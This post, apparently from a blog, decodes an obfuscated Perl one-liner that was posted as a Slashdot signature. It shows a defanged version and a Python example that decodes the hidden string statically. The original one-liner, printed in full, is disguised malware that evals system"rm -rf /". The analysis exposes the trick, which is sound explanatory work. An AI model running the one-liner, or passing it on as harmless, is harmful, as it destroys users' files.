In a comment on Slashdot, there was a malicious "perl -e" signature, as follows (without the leading "#" character):
#perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
The malicious script executes the perl code: system"rm -rf /"
I tried to post an analysis of the sig on Slashdot, but the "lameness filter" caused my message to be refused:
Lameness filter encountered. Post aborted!
Reason: Please use fewer 'junk' characters.
So, I posted the analysis here:
$? # Evaluates to 0
? # beginning of the "?:" ternary operator
s:;s:s;;$?: # this code is never executed
: # the ":" in the "?:" ternary operator
### everything above this comment can be deleted
### with no change in the behaviour of the script
s;;=]=>%-{<-|}<&|`{;; # equivalent to: ($_ = '=]=>%-{<-|}<&|`{');
y; -/:-@[-`{-};`-{/" -;; # equivalent to: tr| -/:-@[-`{-}|`-{/" -|;
print "$_\n"; # added by me
#s;;$_;see # equivalent to eval($_); (commented out by me)
In short form (with arbitrary strings underlined, variables boldfaced, and irrelevant code marked deleted):
#perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Now, if we remove the irrelevant code, and replace the eval($_)-equivalent with print "$_\n", as described above, we get a harmless script that merely outputs the perl code that would be executed by the original script:
#perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
That code is, of course:
system"rm -rf /"
There you have it.
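The same decoding can be done without invoking perl at all, by reimplementing the y/// (tr) step and applying it to the hidden string. The following Python sketch is an added example, not part of the original post; the function names expand_tr_list, perl_tr and decode_signature are hypothetical, and only the tr features this signature uses (plain ranges and literal characters) are handled.

```python
# Added example: static decode of the signature's y/// (tr) step, no Perl involved.

def expand_tr_list(spec: str) -> str:
    """Expand a Perl tr/y character list: 'a-c' becomes 'abc'.

    A '-' that is first or last in the list is a literal dash. Backslash
    escapes are not handled (the signature uses none).
    """
    out = []
    i = 0
    while i < len(spec):
        # A range needs a start char, a '-', and an end char after it.
        if i + 2 < len(spec) and spec[i + 1] == "-":
            lo, hi = ord(spec[i]), ord(spec[i + 2])
            if lo > hi:
                raise ValueError(f"invalid range {spec[i:i + 3]!r}")
            out.extend(chr(c) for c in range(lo, hi + 1))
            i += 3
        else:
            out.append(spec[i])
            i += 1
    return "".join(out)


def perl_tr(text: str, search: str, replace: str) -> str:
    """Apply tr/search/replace/ (no modifiers) to text and return the result."""
    src = expand_tr_list(search)
    dst = expand_tr_list(replace) or src      # empty replacement reuses the search list
    if len(dst) < len(src):
        dst += dst[-1] * (len(src) - len(dst))  # Perl repeats the last character
    table = {}
    for s, d in zip(src, dst):
        table.setdefault(s, d)                # first occurrence of a char wins
    return "".join(table.get(ch, ch) for ch in text)


# Strings copied verbatim from the signature analysed above.
ENCODED = '=]=>%-{<-|}<&|`{'
SEARCH = ' -/:-@[-`{-}'
REPLACE = '`-{/" -'


def decode_signature() -> str:
    """Return the Perl source the signature would have passed to eval."""
    return perl_tr(ENCODED, SEARCH, REPLACE)


if __name__ == "__main__":
    print(decode_signature())
```

Both character lists expand to 32 characters, so every punctuation character in the hidden string maps to exactly one letter, quote, space, slash or dash.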